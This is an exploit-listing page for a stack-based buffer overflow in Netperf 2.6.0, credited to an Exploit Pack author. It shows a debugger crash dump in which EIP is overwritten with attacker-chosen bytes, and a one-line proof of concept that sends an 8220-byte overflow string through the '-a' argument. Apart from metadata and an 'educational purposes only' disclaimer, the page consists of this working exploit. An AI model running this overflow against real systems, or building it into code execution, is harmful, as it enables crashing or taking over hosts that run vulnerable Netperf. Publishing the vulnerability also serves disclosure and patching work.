Exploits / Vulnerability Discovered : 2019-06-17 |
Type : dos |
Platform : linux
This exploit / vulnerability Netperf 2.6.0 stackbased buffer overflow is for educational purposes only and if it is used you will do on your own risk!
[+] Code ...
# Exploit Author: Juan Sacco <jsacco@exploitpack.com> - http://exploitpack.com
#
# Tested on: Kali i686 GNU/Linux
#
# Description: Netperf 2.6.0 s a benchmark tool than developed by Helett Packard that can be used to measure the performance of many different types of networking.
# It provides tests for both unidirectional troughput and end-to-end latency.
#
# Vendor: https://hewlettpackard.github.io/netperf/
#
# Program received signal SIGSEGV, Segmentation fault.
# 0x41424344 in ?? ()
# LEGEND: STACK | HEAP | CODE | DATA | RWX | RODATA
# EAX 0x6d
# EBX 0x41414141 ('AAAA')
# ECX 0x6f
# EDX 0x430320 (test_name) 'TCP_STREAM'
# EDI 0xb7ea2000 (_GLOBAL_OFFSET_TABLE_)
# ESI 0xbfffd2c0 0x3
# EBP 0x41414141 ('AAAA')
# ESP 0xbfffd280 0x0
# EIP 0x41424344 ('DCBA')
# Invalid address 0x41424344
# Program received signal SIGSEGV (fault address 0x41424344)
# PoC: run -a `python -c 'print "A"*8220+"DCBA"'`